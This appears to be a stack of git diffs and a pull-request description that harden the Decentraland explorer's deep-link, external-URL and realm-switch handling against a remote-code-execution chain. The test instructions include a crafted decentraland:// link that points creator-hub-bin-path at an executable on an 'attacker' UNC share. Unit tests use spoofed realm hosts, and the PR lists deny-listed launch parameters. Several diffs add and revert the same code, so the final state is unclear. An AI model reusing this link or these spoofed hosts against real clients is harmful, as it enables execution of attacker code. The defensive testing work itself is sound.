+        [TestCase("https://peer.decentraland.org", true)]
+        [TestCase("https://worlds-content-server.decentraland.org/world/x.dcl.eth", true)]
+        [TestCase("https://evil.example/org", false)]              // substring "org" no longer passes
+        [TestCase("https://decentraland.org.attacker.com", false)] // suffix-spoof
+        [TestCase("https://attacker-decentraland.org", false)]     // not a real subdomain boundary
+        public void ValidateOrgBySuffix(string realm, bool expectSuccess)
+        {
+            var validator = new ChatEnvironmentValidator(DecentralandEnvironment.Org);
+            Assert.AreEqual(expectSuccess, validator.ValidateTeleport(realm).Success, realm);
+        }
+
+        [TestCase("https://peer.decentraland.zone", true)]
+        [TestCase("https://evil.example/zone", false)]
+        public void ValidateZoneBySuffix(string realm, bool expectSuccess)
+        {
+            var validator = new ChatEnvironmentValidator(DecentralandEnvironment.Zone);
+            Assert.AreEqual(expectSuccess, validator.ValidateTeleport(realm).Success, realm);
+        }
+    }
+}

--- a/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs.meta
+++ b/Explorer/Assets/DCL/Tests/Editor/ChatEnvironmentValidatorShould.cs.meta
@@ -1,0 +1,2 @@
+fileFormatVersion: 2
+guid: 20aae7d5f1561264c8c0f06825f4a2a9

--- a/Explorer/Assets/DCL/UI/AssemblyInfo.cs
+++ b/Explorer/Assets/DCL/UI/AssemblyInfo.cs
@@ -1,0 +1,5 @@
+using System.Runtime.CompilerServices;
+
+// Exposes internal members (e.g. ChangeRealmPromptController.DestinationHostFor) to the EditMode test assembly
+// so security-critical host parsing can be unit-tested without widening the members to public.
+[assembly: InternalsVisibleTo("DCL.EditMode.Tests")]

--- a/Explorer/Assets/DCL/UI/AssemblyInfo.cs.meta
+++ b/Explorer/Assets/DCL/UI/AssemblyInfo.cs.meta
@@ -1,0 +1,2 @@
+fileFormatVersion: 2
+guid: d8c10cbfea997674e938377903c2ccf9

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
@@ -3,7 +3,6 @@ using Cysharp.Threading.Tasks;
 using DCL.Diagnostics;
 using DCL.Optimization.Pools;
 using DCL.WebRequests.Analytics;
-using Global.AppArgs;
 using System;
 using System.Collections.Generic;
 using System.Linq;
@@ -50,10 +49,10 @@ namespace DCL.WebRequests.ChromeDevtool
             new (1, new Bridge());
 #endif
 
-        public static ChromeDevToolHandler New(bool startOnCreation, IAppArgs appArgs)
+        public static ChromeDevToolHandler New(bool startOnCreation)
         {
 #if UNITY_WEBGL // ChromeDevtoolProtocolClient is not supported on WebGL. WebSocket server cannot be instantiated from a webpage, use mock
-            return new ChromeDevToolHandler(0, null!); 
+            return new ChromeDevToolHandler(0, null!);
 #else
             const int PORT = 1473;
 
@@ -61,7 +60,7 @@ namespace DCL.WebRequests.ChromeDevtool
 
             var bridge = new Bridge(
                 handleMethod: HandleCdpMethod,
-                browser: new CreatorHubBrowser(appArgs, PORT),
+                browser: new CreatorHubBrowser(PORT),
                 logger: new DCLLogger(ReportCategory.CHROME_DEVTOOL_PROTOCOL),
                 port: PORT
             );

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
@@ -3,6 +3,7 @@ using Cysharp.Threading.Tasks;
 using DCL.Diagnostics;
 using DCL.Optimization.Pools;
 using DCL.WebRequests.Analytics;
+using Global.AppArgs;
 using System;
 using System.Collections.Generic;
 using System.Linq;
@@ -49,7 +50,7 @@ namespace DCL.WebRequests.ChromeDevtool
             new (1, new Bridge());
 #endif
 
-        public static ChromeDevToolHandler New(bool startOnCreation)
+        public static ChromeDevToolHandler New(bool startOnCreation, IAppArgs appArgs)
         {
 #if UNITY_WEBGL // ChromeDevtoolProtocolClient is not supported on WebGL. WebSocket server cannot be instantiated from a webpage, use mock
             return new ChromeDevToolHandler(0, null!);
@@ -60,7 +61,7 @@ namespace DCL.WebRequests.ChromeDevtool
 
             var bridge = new Bridge(
                 handleMethod: HandleCdpMethod,
-                browser: new CreatorHubBrowser(PORT),
+                browser: new CreatorHubBrowser(appArgs, PORT),
                 logger: new DCLLogger(ReportCategory.CHROME_DEVTOOL_PROTOCOL),
                 port: PORT
             );

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/ChromeDevToolHandler.cs
@@ -3,7 +3,6 @@ using Cysharp.Threading.Tasks;
 using DCL.Diagnostics;
 using DCL.Optimization.Pools;
 using DCL.WebRequests.Analytics;
-using Global.AppArgs;
 using System;
 using System.Collections.Generic;
 using System.Linq;
@@ -50,7 +49,7 @@ namespace DCL.WebRequests.ChromeDevtool
             new (1, new Bridge());
 #endif
 
-        public static ChromeDevToolHandler New(bool startOnCreation, IAppArgs appArgs)
+        public static ChromeDevToolHandler New(bool startOnCreation)
         {
 #if UNITY_WEBGL // ChromeDevtoolProtocolClient is not supported on WebGL. WebSocket server cannot be instantiated from a webpage, use mock
             return new ChromeDevToolHandler(0, null!);
@@ -61,7 +60,7 @@ namespace DCL.WebRequests.ChromeDevtool
 
             var bridge = new Bridge(
                 handleMethod: HandleCdpMethod,
-                browser: new CreatorHubBrowser(appArgs, PORT),
+                browser: new CreatorHubBrowser(PORT),
                 logger: new DCLLogger(ReportCategory.CHROME_DEVTOOL_PROTOCOL),
                 port: PORT
             );

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
@@ -4,13 +4,23 @@ using Plugins.DclNativeProcesses;
 using RichTypes;
 using System;
 using System.IO;
+#if UNITY_EDITOR
+using UnityEditor;
+#endif
 
 namespace DCL.WebRequests.ChromeDevtool
 {
     public class CreatorHubBrowser : IBrowser
     {
+        /// <summary>
+        ///     EditorPrefs key holding a developer-local override for the Creator Hub executable path.
+        ///     It is assigned through the Debug Settings drawer and read only in the Editor: it is never
+        ///     sourced from app-args or deep links (SEC-005) and is compiled out of player builds, so a
+        ///     shipped client can only ever launch the pinned <see cref="DEFAULT_CREATOR_HUB_BIN_PATH" />.
+        /// </summary>
+        public const string BIN_PATH_EDITOR_PREF_KEY = "CreatorHubBrowser.BinPathOverride";
+
         private const string DEVTOOL_PORT_ARG = "--open-devtools-with-port=";
-        private readonly int port;
 
 #if UNITY_EDITOR_WIN || UNITY_STANDALONE_WIN || PLATFORM_STANDALONE_WIN
         // path for: C:\Users\<YourUsername>\AppData\Local\Programs\creator-hub\Decentraland Creator Hub.exe
@@ -23,6 +33,8 @@ namespace DCL.WebRequests.ChromeDevtool
         public static readonly string DEFAULT_CREATOR_HUB_BIN_PATH = "/Applications/Decentraland Creator Hub.app/Contents/MacOS/Decentraland Creator Hub";
 #endif
 
+        private readonly int port;
+
         public CreatorHubBrowser(int port)
         {
             this.port = port;
@@ -30,7 +42,7 @@ namespace DCL.WebRequests.ChromeDevtool
 
         public BrowserOpenResult OpenUrl(string url)
         {
-            string path = DEFAULT_CREATOR_HUB_BIN_PATH;
+            string path = ResolveBinPath();
 
             if (File.Exists(path) == false)
             {
@@ -49,6 +61,17 @@ namespace DCL.WebRequests.ChromeDevtool
             }
 
             return BrowserOpenResult.Success();
+        }
+
+        private static string ResolveBinPath()
+        {
+#if UNITY_EDITOR
+            string overridePath = EditorPrefs.GetString(BIN_PATH_EDITOR_PREF_KEY, string.Empty);
+
+            if (!string.IsNullOrEmpty(overridePath))
+                return overridePath;
+#endif
+            return DEFAULT_CREATOR_HUB_BIN_PATH;
         }
     }
 }

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
@@ -1,6 +1,5 @@
 using CDPBridges;
 using DCL.Diagnostics;
-using Global.AppArgs;
 using Plugins.DclNativeProcesses;
 using RichTypes;
 using System;
@@ -11,7 +10,6 @@ namespace DCL.WebRequests.ChromeDevtool
     public class CreatorHubBrowser : IBrowser
     {
         private const string DEVTOOL_PORT_ARG = "--open-devtools-with-port=";
-        private readonly IAppArgs appArgs;
         private readonly int port;
 
 #if UNITY_EDITOR_WIN || UNITY_STANDALONE_WIN || PLATFORM_STANDALONE_WIN
@@ -25,15 +23,14 @@ namespace DCL.WebRequests.ChromeDevtool
         public static readonly string DEFAULT_CREATOR_HUB_BIN_PATH = "/Applications/Decentraland Creator Hub.app/Contents/MacOS/Decentraland Creator Hub";
 #endif
 
-        public CreatorHubBrowser(IAppArgs appArgs, int port)
+        public CreatorHubBrowser(int port)
         {
-            this.appArgs = appArgs;
             this.port = port;
         }
 
         public BrowserOpenResult OpenUrl(string url)
         {
-            string path = CreatorHubExecutablePath();
+            string path = DEFAULT_CREATOR_HUB_BIN_PATH;
 
             if (File.Exists(path) == false)
             {
@@ -43,13 +40,7 @@ namespace DCL.WebRequests.ChromeDevtool
 
             ReportHub.LogWarning(ReportCategory.CHROME_DEVTOOL_PROTOCOL, "Url always ignored by Creator Hub Browser, port is used");
 
-            Result result = DclProcesses.Start(
-                path,
-                new[]
-                {
-                    $"{DEVTOOL_PORT_ARG}{port}",
-                }
-            );
+            Result result = DclProcesses.Start(path, new[] { $"{DEVTOOL_PORT_ARG}{port}" });
 
             if (result.Success == false)
             {
@@ -58,15 +49,6 @@ namespace DCL.WebRequests.ChromeDevtool
             }
 
             return BrowserOpenResult.Success();
-        }
-
-        private string CreatorHubExecutablePath()
-        {
-            if (appArgs.TryGetValue(AppArgsFlags.CREATOR_HUB_BIN_PATH, out string? path))
-                return path!;
-
-            ReportHub.LogWarning(ReportCategory.CHROME_DEVTOOL_PROTOCOL, "Creator Hub path is not provided, fallback to default path");
-            return DEFAULT_CREATOR_HUB_BIN_PATH;
         }
     }
 }

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
@@ -1,6 +1,7 @@
 using CDPBridges;
+using Crosstales.FB;
 using DCL.Diagnostics;
-using Global.AppArgs;
+using DCL.Prefs;
 using Plugins.DclNativeProcesses;
 using RichTypes;
 using System;
@@ -12,7 +13,6 @@ namespace DCL.WebRequests.ChromeDevtool
     {
         private const string DEVTOOL_PORT_ARG = "--open-devtools-with-port=";
 
-        private readonly IAppArgs appArgs;
         private readonly int port;
 
 #if UNITY_EDITOR_WIN || UNITY_STANDALONE_WIN || PLATFORM_STANDALONE_WIN
@@ -22,23 +22,28 @@ namespace DCL.WebRequests.ChromeDevtool
                 Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
                 "Programs", "creator-hub", "Decentraland Creator Hub.exe"
             );
+
+        private const string EXECUTABLE_EXTENSION = "exe";
 #else
         public static readonly string DEFAULT_CREATOR_HUB_BIN_PATH = "/Applications/Decentraland Creator Hub.app/Contents/MacOS/Decentraland Creator Hub";
+
+        private const string EXECUTABLE_EXTENSION = "*";
 #endif
 
-        public CreatorHubBrowser(IAppArgs appArgs, int port)
+        public CreatorHubBrowser(int port)
         {
-            this.appArgs = appArgs;
             this.port = port;
         }
 
         public BrowserOpenResult OpenUrl(string url)
         {
-            string path = CreatorHubExecutablePath();
+            // Resolve lazily: the CDP bridge is the only consumer of the Creator Hub path, so we only
+            // touch PlayerPrefs / prompt the developer when DevTools actually needs to launch it.
+            string path = ResolveBinPath();
 
-            if (File.Exists(path) == false)
+            if (string.IsNullOrEmpty(path) || File.Exists(path) == false)
             {
-                BrowserOpenError error = BrowserOpenError.FromException(new Exception($"Creator Hub is not installed in path: {path}"));
+                BrowserOpenError error = BrowserOpenError.FromException(new Exception($"Creator Hub executable not found or not selected (resolved path: '{path}')"));
                 return BrowserOpenResult.FromBrowserOpenError(error);
             }
 
@@ -56,17 +61,47 @@ namespace DCL.WebRequests.ChromeDevtool
         }
 
         /// <summary>
-        ///     The Creator Hub executable to launch. Sourced from the <c>creator-hub-bin-path</c> app-arg
-        ///     (command line / editor Debug Settings) — a trusted channel: the SEC-019 deny-by-default deep-link
-        ///     allowlist drops this key, so an attacker-crafted <c>decentraland://</c> link can never set it.
-        ///     When absent, falls back to the pinned <see cref="DEFAULT_CREATOR_HUB_BIN_PATH" />.
+        ///     Resolves the Creator Hub executable: a path the developer previously selected (remembered in
+        ///     <see cref="DCLPlayerPrefs" />) wins; otherwise the pinned default install path; otherwise the
+        ///     developer is prompted once to locate it and the choice is remembered. There is no app-arg /
+        ///     deep-link input (SEC-005) — the path is either the known install location or a local file the
+        ///     developer explicitly picks.
         /// </summary>
-        private string CreatorHubExecutablePath()
+        private static string ResolveBinPath()
         {
-            if (appArgs.TryGetValue(AppArgsFlags.CREATOR_HUB_BIN_PATH, out string? path) && !string.IsNullOrEmpty(path))
-                return path;
+            string savedPath = DCLPlayerPrefs.GetString(DCLPrefKeys.CREATOR_HUB_BIN_PATH);
 
-            return DEFAULT_CREATOR_HUB_BIN_PATH;
+            if (!string.IsNullOrEmpty(savedPath) && File.Exists(savedPath))
+                return savedPath;
+
+            if (File.Exists(DEFAULT_CREATOR_HUB_BIN_PATH))
+                return DEFAULT_CREATOR_HUB_BIN_PATH;
+
+            string picked = PromptForExecutable();
+
+            if (!string.IsNullOrEmpty(picked))
+            {
+                DCLPlayerPrefs.SetString(DCLPrefKeys.CREATOR_HUB_BIN_PATH, picked, save: true);
+                return picked;
+            }
+
+            return string.Empty;
+        }
+
+        private static string PromptForExecutable()
+        {
+            FileBrowser fileBrowser = FileBrowser.Instance;
+
+            // Enable synchronous picking on macOS (off by default) so the dialog fits OpenUrl's synchronous contract.
+            fileBrowser.AllowSyncCalls = true;
+
+            string startDirectory = File.Exists(DEFAULT_CREATOR_HUB_BIN_PATH)
+                ? Path.GetDirectoryName(DEFAULT_CREATOR_HUB_BIN_PATH) ?? string.Empty
+                : string.Empty;
+
+            string? selected = fileBrowser.OpenSingleFile("Select the Decentraland Creator Hub executable", startDirectory, string.Empty, EXECUTABLE_EXTENSION);
+
+            return selected ?? string.Empty;
         }
     }
 }

--- a/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
+++ b/Explorer/Assets/DCL/WebRequests/ChromeDevtool/CreatorHubBrowser.cs
@@ -1,26 +1,19 @@
 using CDPBridges;
 using DCL.Diagnostics;
+using Global.AppArgs;
 using Plugins.DclNativeProcesses;
 using RichTypes;
 using System;
 using System.IO;
-#if UNITY_EDITOR
-using UnityEditor;
-#endif
 
 namespace DCL.WebRequests.ChromeDevtool
 {
     public class CreatorHubBrowser : IBrowser
     {
-        /// <summary>
-        ///     EditorPrefs key holding a developer-local override for the Creator Hub executable path.
-        ///     It is assigned through the Debug Settings drawer and read only in the Editor: it is never
-        ///     sourced from app-args or deep links (SEC-005) and is compiled out of player builds, so a
-        ///     shipped client can only ever launch the pinned <see cref="DEFAULT_CREATOR_HUB_BIN_PATH" />.
-        /// </summary>
-        public const string BIN_PATH_EDITOR_PREF_KEY = "CreatorHubBrowser.BinPathOverride";
-
         private const string DEVTOOL_PORT_ARG = "--open-devtools-with-port=";
+
+        private readonly IAppArgs appArgs;
+        private readonly int port;
 
 #if UNITY_EDITOR_WIN || UNITY_STANDALONE_WIN || PLATFORM_STANDALONE_WIN
         // path for: C:\Users\<YourUsername>\AppData\Local\Programs\creator-hub\Decentraland Creator Hub.exe
@@ -33,16 +26,15 @@ namespace DCL.WebRequests.ChromeDevtool
         public static readonly string DEFAULT_CREATOR_HUB_BIN_PATH = "/Applications/Decentraland Creator Hub.app/Contents/MacOS/Decentraland Creator Hub";
 #endif
 
-        private readonly int port;
-
-        public CreatorHubBrowser(int port)
+        public CreatorHubBrowser(IAppArgs appArgs, int port)
         {
+            this.appArgs = appArgs;
             this.port = port;
         }
 
         public BrowserOpenResult OpenUrl(string url)
         {
-            string path = ResolveBinPath();
+            string path = CreatorHubExecutablePath();
 
             if (File.Exists(path) == false)
             {
@@ -63,14 +55,17 @@ namespace DCL.WebRequests.ChromeDevtool
             return BrowserOpenResult.Success();
         }
 
-        private static string ResolveBinPath()
+        /// <summary>
+        ///     The Creator Hub executable to launch. Sourced from the <c>creator-hub-bin-path</c> app-arg
+        ///     (command line / editor Debug Settings) — a trusted channel: the SEC-019 deny-by-default deep-link
+        ///     allowlist drops this key, so an attacker-crafted <c>decentraland://</c> link can never set it.
+        ///     When absent, falls back to the pinned <see cref="DEFAULT_CREATOR_HUB_BIN_PATH" />.
+        /// </summary>
+        private string CreatorHubExecutablePath()
         {
-#if UNITY_EDITOR
-            string overridePath = EditorPrefs.GetString(BIN_PATH_EDITOR_PREF_KEY, string.Empty);
+            if (appArgs.TryGetValue(AppArgsFlags.CREATOR_HUB_BIN_PATH, out string? path) && !string.IsNullOrEmpty(path))
+                return path;
 
-            if (!string.IsNullOrEmpty(overridePath))
-                return overridePath;
-#endif
             return DEFAULT_CREATOR_HUB_BIN_PATH;
         }
     }

--- a/docs/app-arguments.md
+++ b/docs/app-arguments.md
@@ -337,17 +337,6 @@ decentraland://?force-open-backpack=true
 
 ---
 
-### `creator-hub-bin-path`
-**Type:** String (file path)
-**Description:** Custom path to the Creator Hub binary launched by the Chrome DevTools Protocol bridge. Honored **only via app-args** (command line / editor Debug Settings) — the SEC-019 deep-link allowlist drops this key, so it cannot be set through a `decentraland://` link. When absent, the pinned default install path is used.
-
-**Usage:**
-```bash
---creator-hub-bin-path /path/to/creator-hub
-```
-
----
-
 ### `use-log-matrix`
 **Type:** String (file path)
 **Description:** Enables logging to a matrix file. The value should be the path to the log matrix file.

--- a/docs/app-arguments.md
+++ b/docs/app-arguments.md
@@ -337,17 +337,6 @@ decentraland://?force-open-backpack=true
 
 ---
 
-### `creator-hub-bin-path`
-**Type:** String (file path)
-**Description:** Specifies a custom path to the Creator Hub binary. Used when the Creator Hub needs to be launched from a non-standard location.
-
-**Usage:**
-```bash
---creator-hub-bin-path /path/to/creator-hub
-```
-
----
-
 ### `use-log-matrix`
 **Type:** String (file path)
 **Description:** Enables logging to a matrix file. The value should be the path to the log matrix file.

--- a/docs/app-arguments.md
+++ b/docs/app-arguments.md
@@ -337,6 +337,17 @@ decentraland://?force-open-backpack=true
 
 ---
 
+### `creator-hub-bin-path`
+**Type:** String (file path)
+**Description:** Custom path to the Creator Hub binary launched by the Chrome DevTools Protocol bridge. Honored **only via app-args** (command line / editor Debug Settings) — the SEC-019 deep-link allowlist drops this key, so it cannot be set through a `decentraland://` link. When absent, the pinned default install path is used.
+
+**Usage:**
+```bash
+--creator-hub-bin-path /path/to/creator-hub
+```
+
+---
+
 ### `use-log-matrix`
 **Type:** String (file path)
 **Description:** Enables logging to a matrix file. The value should be the path to the log matrix file.


### PR DESCRIPTION
# Pull Request Description

## What does this PR change?

Hardens the `decentraland://` deep-link + scene `openExternalUrl` surface, which today allows a **one-click / one-in-world-click RCE chain** and a **silent realm takeover**. Defense-in-depth: each fix independently breaks the chain.

This is the **unity-explorer (client) half**. The `launcher-rust` delivery half of SEC-005/SEC-028 is a separate repo/PR — either side alone breaks the chain.

### Issues fixed (Notion)

| Finding | What this PR does |
|---|---|
| [SEC-019 — Deep-link → app-argument injection](https://app.notion.com/p/3a35f41146a581738df6c1dea6fc1eb7) | Deny-by-default allowlist in `ProcessDeepLinkParameters` (`DeepLinkAllowlist`): only navigation/share/login params survive for any realm; the Creator Hub / SDK local-dev params survive only when the realm is loopback (see D2). Root fix — closes the whole injectable-flag family in one place. |
| [SEC-005 — Deep link launches attacker executable (`creator-hub-bin-path`)](https://app.notion.com/p/3a35f41146a581ff9660cd68c8865b58) | **Client half:** the `creator-hub-bin-path` app-arg is removed entirely. When the CDP DevTools bridge needs Creator Hub, `CreatorHubBrowser` resolves the executable at runtime — a developer-selected path remembered in `PlayerPrefs` → the pinned default install path → otherwise a one-time native file-picker prompt (remembered for next time). No attacker-reachable input reaches the exec sink (see D4). |
| [SEC-028 — Scene `openExternalUrl("decentraland://…")` → launcher relaunch → SEC-005](https://app.notion.com/p/3a35f41146a5811d8db2f4b957e89b30) | **Client half:** central `http(s)`-only scheme policy (`ExternalUrlPolicy`) at the shared browser sink + prompt construction, so a custom-scheme URL can never reach `Application.OpenURL`. |
| [SEC-008 — `openExternalUrl` / profile links: no scheme allowlist + empty-host trust-cache bypass](https://app.notion.com/p/3a35f41146a5818587bddd1ad2cf200e) | Same scheme policy + trust cache re-keyed on `(scheme, host)`, never caching an empty host. |
| [SEC-003 — `changeRealm()` empty-message consent bypass](https://app.notion.com/p/3a35f41146a581469d56cf052328d521) | Prompt never auto-approves an empty message; always renders the destination and requires an explicit click; host displayed is sanitized (rich-text disabled) and shown as the parsed host. |
| [SEC-004 — Runtime deep link silently connects to an attacker realm](https://app.notion.com/p/3a35f41146a58169b4c5d0d43a2ba2ac) | Runtime `realm` deep links now route through the (fixed) consent prompt; substring `Contains("org")` replaced with a parsed host-suffix check. |

### Partially addressed / incidental

| Finding | Status |
|---|---|
| [SEC-020 — Cold-start deep link sets arbitrary realm + can enable local-scene-dev websocket](https://app.notion.com/p/3a35f41146a5819bbee9e9809156b049) | **Partial.** The dangerous half (a deep link enabling `local-scene`, opening the LSD websocket to an attacker realm) is closed by the loopback gate — `local-scene` and the other local-dev params are dropped unless the realm is loopback (see D2). The remaining cold-start custom-realm *host-validation* is **deferred** (see design note D6). |
| [SEC-052 — `--friends-api-url` `ws://` social-service override](https://app.notion.com/p/3a35f41146a5814b91b3ea48d6191c07) | The **deep-link injection vector** for `friends-api-url` is incidentally closed by the allowlist. The broader arg-level concern (CLI override) is out of scope here. |

## ⚠️ Design decisions requiring stakeholder sign-off

SEC-019/020 are flagged "Design affected"; these choices are mine as sensible defaults and are **pending product/stakeholder approval** (owner will sign off separately). Each lists the **default introduced** and the **rationale**.

**D1 — Deep-link param allowlist contents** (`DeepLinkAllowlist.PERMITTED_KEYS`)
- **Default:** permit `realm`, `position`, `community`, `signin`, `authRequestId`, `force-open-backpack`; drop everything else.
- **Rationale:** a deep link is fully attacker-controllable, so a param is permitted only when it is a benign navigation / share / login intent whose worst case is already gated elsewhere (a consent prompt, a matching login token, or a plain coordinate). These are also the only params the deep-link handlers actually consume. Reasoning per key (mirrors the comments in `DeepLinkAllowlist.cs`):

  | Permitted param | Why it is safe to accept from a link |
  |---|---|
  | `realm` | Which world/realm to enter. Attacker-controllable, but never applied silently: the switch is routed through the ChangeRealm consent prompt (SEC-004) and a host-suffix environment check. |
  | `position` | Target parcel `x,y` to land on. A plain coordinate — no security impact. |
  | `community` | Community id shown as a "view this community" notification; opening the card is a user action. Benign UI. |
  | `signin` | Login flow: opaque identity id from the auth website's signin link. Consumed only while a local login is actively awaiting one **and** `authRequestId` matches the request that minted it. |
  | `authRequestId` | Login flow: binds a signin link to the login that requested it; inert without a matching pending login. |
  | `force-open-backpack` | Opens the user's own backpack panel on landing (shipped deep-link feature). Benign in-client navigation. |

  Beyond the always-permitted set, the Creator Hub / SDK local-dev params (`local-scene`, `dclenv`, `hub`, `skip-auth-screen`, `landscape-terrain-enabled`, `multi-instance`) are permitted **only for a loopback realm** (see D2). Everything else is dropped for every realm — the categories we never permit:

  | Dropped category | Example params |
  |---|---|
  | Launch code (SEC-005) | `creator-hub-bin-path`, `launch-cdp-monitor-on-start` |
  | Point the client at attacker infrastructure | `comms-adapter`, `gatekeeper-url`, `friends-api-url` (SEC-052), `feature-flags-url`/`-hostname`, `optimized-assets-url`, `lsd-remote-ab-server`/`-world`, `pulse` |
  | Bypass a version/specs screen | `skip-version-check`, `skip-minimum-specs-screen` |
  | Enable a dev/debug/test mode | `debug`, `scene-console`, `autopilot`, `alttester`, `simulate*` |
  | Tamper with config | feature gates, cache/disk, identity/session, chat limits, rendering, analytics ids |

**D2 — SDK / Creator Hub local-dev params are loopback-conditional** (`ProcessDeepLinkParameters`, `DeepLinkAllowlist.LOOPBACK_REALM_PERMITTED_KEYS`)
- **Default:** the local-development params Creator Hub and `sdk-commands` attach to their preview deep links — `local-scene`, `dclenv`, `hub`, `skip-auth-screen`, `landscape-terrain-enabled`, `multi-instance` — are permitted from a deep link **only when the accompanying realm host is loopback** (`127.0.0.1` / `localhost` / `[::1]`); dropped otherwise. The SEC-005 exec params (`creator-hub-bin-path`, `launch-cdp-monitor-on-start`) are **not** in this set and stay dropped for every realm.
- **Rationale:** lets a legitimate localhost Creator-Hub / SDK preview deep link carry the dev flags it needs (`development-guide.md`, `app-arguments.md`), while a remote-realm attacker deep link can enable none of them. The gate is a heuristic (an attacker could pair the flags with `realm=127.0.0.1`), so it rests on each param being individually low-harm — an env enum, an analytics tag, a cosmetic toggle, an instance count, or a screen skip that still forces auth when no valid identity is cached — with the worst case a client booting toward dead localhost, not a compromise. Expanded from the original local-scene-only gate for the Hub/SDK preview workflow.

**D3 — Realm environment host-suffixes** (`ChatEnvironmentValidator`)
- **Default:** Org accepts hosts ending in `decentraland.org`; Zone accepts `decentraland.zone`.
- **Rationale:** this is an **environment guard, not the trust boundary** — the consent prompt (D5) + the shown host are the real protection. A strict suffix would reject legitimate third-party/custom catalysts, so the suffixes live in editable constants and are intentionally *not* a hard trust allowlist.

**D4 — CreatorHub path: no app-arg; runtime resolve + prompt** (`CreatorHubBrowser`)
- **Default:** the `creator-hub-bin-path` app-arg is removed entirely. When the CDP DevTools bridge needs to launch Creator Hub, `CreatorHubBrowser` resolves the executable as: a developer-selected path remembered in `PlayerPrefs` (if it still exists) → the pinned default install path → otherwise a one-time native file-picker prompt (FileBrowser PRO; Editor + Win/Mac/Linux standalone), remembered in `PlayerPrefs`. No code-signature/bundle-identity verification is added.
- **Rationale:** removes the RCE at the source — no attacker-reachable path input feeds the exec sink — while keeping the dev feature usable when Creator Hub isn't at the default location, and without reintroducing an app-arg / deep-link channel. The prompt fires only when DevTools is actually launched. (Supersedes the earlier pin-only approach.) Signature verification stays deferred (defense-in-depth; non-trivial cross-platform).

**D5 — Consent-prompt default message copy** (`ChangeRealmPromptController.DEFAULT_CONFIRMATION_MESSAGE`)
- **Default:** `"Are you sure you want to enter this World?"` when a scene supplies no message.
- **Rationale:** an empty message must no longer mean "skip consent"; this copy matches the existing chat-hyperlink confirmation wording.

**D6 — SEC-020 cold-start realm host-validation: deferred (scope)**
- **Default:** not implemented in this PR.
- **Rationale:** the high-impact half (deep-link `local-scene` websocket) is already closed (D2). Validating the cold-start custom realm needs `DecentralandEnvironment` threaded into `RealmLaunchSettings.ApplyConfig` (boot caller + tests) — material scope; proposed as a follow-up.

## Test Instructions

### Prerequisites
- [x] Desktop build (the RCE sink is desktop-only; WebGL is unaffected).
- [ ] The local path of the build executable `metaforge explorer run` downloads (check its console output/cache folder) — some scenarios below launch it directly rather than clicking a `decentraland://` link; see the callout before Group A.
- [ ] A local SDK7 scene running via `npm run start` (default `http://127.0.0.1:8000`), using the snippet under Group B — needed wherever a scenario says "test scene."
- [ ] Optional, strengthens the SEC-005 check only: Decentraland Creator Hub installed at its default path (`%LOCALAPPDATA%\Programs\creator-hub\Decentraland Creator Hub.exe` on Windows).

```bash
metaforge explorer run 9466
```

Use `metaforge explorer logs tail --filter "<text>"` (attach it **before** launching — several lines below are emitted at boot) or the local Player log (`%USERPROFILE%\AppData\LocalLow\Decentraland\Explorer\Player.log` on Windows) to check the log lines called out in each scenario.

The scenarios are grouped by the chain each closes. Every scenario states its **delivery method** — a crafted deep link (cold start, or to an already-running client), a malicious test scene, or a plain cold start — so it's runnable without needing to read the diff.

**Delivering a deep link against *this* build (applies to Groups A, C, D):** per `docs/development-guide.md` § Deep Link, clicking an actual `decentraland://` link always opens the currently **installed launcher**, which runs the latest **released** build — never the PR build under test. To exercise this PR's code specifically:
- *Cold start* — launch the downloaded PR executable directly, passing the whole link as one quoted argument, e.g. `"<path-to-build>\Decentraland.exe" "decentraland://?..."`.
- *Client already running* — drop the JSON file the launcher normally writes for a running instance to pick up, at `%LOCALAPPDATA%\DecentralandLauncherLight\deeplink-bridge.json` (macOS: `~/Library/Application Support/DecentralandLauncherLight/deeplink-bridge.json`), content `{"deeplink": "decentraland://?..."}`. It's polled every ~200 ms and deleted once consumed — that deletion is itself proof the link was read.

---

### Group A — RCE chain: deep link → app-arg injection → attacker executable (SEC-019, SEC-005)

**A1. Cold start: launch/CDP/local-scene/comms/auth-bypass params never reach app-args**
- Delivery: cold start (see callout above).
- Steps:
  1. Confirm no Explorer instance is already running.
  2. Launch: `"<path-to-build>\Decentraland.exe" "decentraland://?creator-hub-bin-path=%5C%5Cattacker%5Cshare%5Cp.exe&launch-cdp-monitor-on-start&local-scene=true&comms-adapter=x&skip-auth-screen=true"` (this exact string — UNC path included — is what this PR's own regression test drives; `%5C%5C` decodes to `\\`).
  3. Let it boot fully, through the auth screen.
- Expected (PASS): the login/auth screen still appears and must be completed — `skip-auth-screen` had no effect. No Creator Hub window/process and no CDP-monitor/DevTools window ever appear (check Task Manager/Activity Monitor). The client does not enter local-scene-dev mode. It lands on its normal default realm/comms adapter, not `x`. The boot log contains `Dropped 5 non-allowlisted deep-link param(s): creator-hub-bin-path, launch-cdp-monitor-on-start, local-scene, comms-adapter, skip-auth-screen`.
- FAIL if: auth is skipped, any unexpected process/window appears, local-scene mode is entered, or that log line is missing or names fewer than 5 keys.
- Evidence: the log line (`logs tail --filter Dropped`) + a screenshot of the auth screen appearing.
